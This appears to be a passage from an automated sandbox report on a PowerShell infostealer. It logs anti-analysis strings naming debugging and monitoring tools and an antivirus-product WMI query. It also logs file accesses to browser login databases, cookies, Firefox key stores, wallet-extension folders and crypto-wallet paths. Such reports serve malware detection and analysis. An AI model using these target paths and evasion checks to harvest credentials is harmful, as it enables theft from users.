              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OllyDbg.exe
              Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tcpview.exe
              Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Wireshark.exe
              Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: lordpe.exe
              Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: procexp.exe
              Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Procmon.exe
              Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autoruns.exe
              Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: regmon.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: powershell.exe, 0000000A.00000002.2892223741.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
              Source: powershell.exe, 0000000A.00000002.2892223741.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: powershell.exe, 0000000A.00000002.2892223741.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: powershell.exe, 0000000A.00000002.2893886945.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *exodus*
              Source: powershell.exe, 0000000A.00000002.2892223741.000000000079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: powershell.exe, 00000002.00000002.1785282910.0000000007920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
